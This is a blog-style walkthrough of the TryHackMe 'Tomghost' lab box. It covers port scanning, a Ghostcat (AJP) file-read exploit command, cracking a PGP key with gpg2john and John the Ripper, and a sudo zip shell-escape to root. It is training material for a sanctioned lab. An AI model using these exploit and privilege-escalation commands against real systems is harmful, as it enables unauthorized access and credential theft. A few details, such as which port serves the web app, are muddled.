TomGhost Write-Up : TryHackMe Walk-through

Tomghost is a Linux machine which is deployed on TryHackMe. It is a defined as a easy level box.

We do not require any special access to solve this box. We just have to register on TryHackMe and continue with it.

Connect via VPN → Join the room → Start the machine.

Here, we are going to explore few new tools and techniques in this walk-through. The IP assigned to me is 10.10.230.122. This might be or might not be same as yours as it is dynamically allocated when machine is started.

Let us first start with the initial reconnaissance.

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

53/tcp open tcpwrapped

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8080/tcp open http Apache Tomcat 9.0.30

We can gradually start enumerating port one by one.

http://10.10.230.122:8080

A web application is hosted on port 8009. After enumerating for a good amount of time, we did not got any foot hold.

Now enumerating port 8009. The application is using is Apache Jserv.

Let us see if there are any public known exploits available for Apache Jserv (Protocol v1.3).

Cloning this GitHub repository.

https://github.com/00theway/Ghostcat-CNVD-2020-10487

Referring this article and trying to exploit the service using the below mentioned command.

python3 ajpShooter.py http://10.10.230.122:8080/ 8009 /WEB-INF/web.xml read

Getting SSH credentials from the exploit, we can easily login.

We can go to the /home/merlin/ page directory and simply capture the flag

cd /home/merlin/
cat user.txt

Privilege Escalation

We can see two files in /home/skyfuck directory.

Here we can see two files with some unique names

credential.pgp
tryhackme.asc

By PGP extension we can assume that it is a PGP File.

Pretty Good Privacy (PGP) is an encryption system used for both sending encrypted emails and encrypting sensitive files. Since its invention back in 1991, PGP has become the de facto standard for email security.

The popularity of PGP is based on two factors. The first is that the system was originally available as freeware, and so spread rapidly among users who wanted an extra level of security for their email messages. The second is that since PGP uses both symmetric encryption and public-key encryption, it allows users who have never met to send encrypted messages to each other without exchanging private encryption keys.

Here, we can see this is PGP private key. Let us try to decrypt it.

gpg2john ../tryhackme.asc > hash

Contents of the hash after using gpg2john.

john — wordlist=/usr/share/wordlists/rockyou.txt hash

Now for decrypting the credentials.pgp file. we need to enter the following commands.

gpg — import tryhackme.asc

gpg — decrypt credential.pgp

While entering the above command, application request for passphrase which we got after cracking the hash.

Now trying to login as merlin using the password we got after decryption.

su merlin

Now we try escalate the privileges from merlin to root.

sudo -l

/usr/bin/zip can be used to escalate privileges.

https://gtfobins.github.io/#

By following the below mentioned commands

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

ROOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOTED!!!

Thank you for your patience and Happy Hacking!!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store